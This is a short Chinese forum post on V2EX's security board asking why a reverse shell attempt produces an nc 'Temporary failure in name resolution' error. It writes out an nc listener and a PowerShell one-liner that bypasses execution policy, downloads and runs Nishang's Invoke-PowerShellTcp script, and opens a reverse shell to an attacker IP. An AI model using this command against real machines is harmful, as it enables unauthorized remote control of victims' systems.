V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
xinali
V2EX  ›  信息安全

shell 反弹竟然出现解析错误?

  •  
  •   xinali · 2017-07-13 20:20:21 +08:00 · 3368 次点击
    这是一个创建于 2487 天前的主题,其中的信息可能已经有所发展或是发生改变。

    在攻击主机 linux 上运行

    nc -lvvp 1212
    

    在被攻击主机 windows 上运行

    cmd.exe /c powershell -exec bypass -c "IEX(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PPowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress xx.xx.xx.xx(ip 地址) -Port 1212"
    

    竟然会在 linux 主机上出现这个错误

    nc: getnameinfo: Temporary failure in name resolution
    

    没有使用过想过域名,应该不存在解析的问题才对啊,为什么会出现name resolution的问题呢?

    目前尚无回复
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   901 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 23:27 · PVG 07:27 · LAX 16:27 · JFK 19:27
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.